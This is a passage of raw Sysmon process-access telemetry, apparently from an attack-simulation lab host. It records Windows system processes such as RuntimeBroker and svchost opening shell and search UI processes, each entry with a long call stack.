6|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165444C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165488C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165456C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165456C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165456C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165456C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165472C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165492C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165492C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165460C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165460C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165480C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32